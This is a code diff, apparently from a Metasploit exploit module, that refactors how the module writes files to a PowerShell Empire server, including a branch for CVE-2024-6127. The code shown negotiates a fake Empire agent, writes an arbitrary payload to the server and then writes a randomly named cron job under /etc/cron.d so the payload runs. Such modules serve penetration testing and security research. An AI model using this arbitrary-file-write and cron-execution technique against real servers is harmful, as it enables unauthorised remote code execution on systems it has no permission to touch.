@@ -180,7 +180,13 @@ def get_staging_key
180
180
staging_key
181
181
end
182
182
183
- def write_file ( path , data , session_id , session_key , server_epoch )
183
+ def write_file ( path , data , session_id , session_key , opts )
184
+ if datastore [ 'CVE' ] == 'CVE-2024-6127'
185
+ write_file_cve_2024_6127 ( path , data , session_id , session_key , opts [ :staging_key ] )
186
+ return
187
+ end
188
+ server_epoch = opts [ :server_epoch ]
189
+
184
190
# target_url.path default traffic profile for empire agent communication
185
191
# https://github.com/adaptivethreat/Empire/blob/293f06437520f4747e82e4486938b1a9074d3d51/setup/setup_database.py#L50
186
192
data = create_packet (
@@ -267,6 +273,7 @@ def exploit
267
273
fail_with ( Failure ::Unknown , "Failed to communicate with STAGE2" ) unless res and res . code == 200
268
274
aes_decrypt ( session_key , res . body )
269
275
276
+ opts = { staging_key : staging_key }
270
277
log_path = "/var/lib/powershell-empire/empire/server/downloads/#{ session_id } /agent.log"
271
278
272
279
else
@@ -289,6 +296,8 @@ def exploit
289
296
server_epoch = body [ 0 ..9 ] . to_i
290
297
session_key = body [ 10 ..-1 ]
291
298
print_good ( 'Successfully negotiated an artificial Empire agent' )
299
+
300
+ opts = { server_epoch : server_epoch }
292
301
log_path = '/agent.log'
293
302
294
303
end
@@ -308,20 +317,12 @@ def exploit
308
317
end
309
318
310
319
print_status ( "Writing payload to #{ payload_path } " )
311
- if datastore [ 'CVE' ] == 'CVE-2024-6127'
312
- write_file_cve_2024_6127 ( payload_path , payload_data , session_id , session_key , staging_key )
313
- else
314
- write_file ( payload_path , payload_data , session_id , session_key , server_epoch )
315
- end
320
+ write_file ( payload_path , payload_data , session_id , session_key , opts )
316
321
317
322
cron_path = '/etc/cron.d/' + rand_text_alpha ( 8 )
318
323
print_status ( "Writing cron job to #{ cron_path } " )
319
324
320
- if datastore [ 'CVE' ] == 'CVE-2024-6127'
321
- write_file_cve_2024_6127 ( cron_path , cron_file ( cron_command ) , session_id , session_key , staging_key )
322
- else
323
- write_file ( cron_path , cron_file ( cron_command ) , session_id , session_key , server_epoch )
324
- end
325
+ write_file ( cron_path , cron_file ( cron_command ) , session_id , session_key , opts )
325
326
print_status ( "Waiting for cron job to run, can take up to 60 seconds" )
326
327
327
328
register_files_for_cleanup ( cron_path )
0 commit comments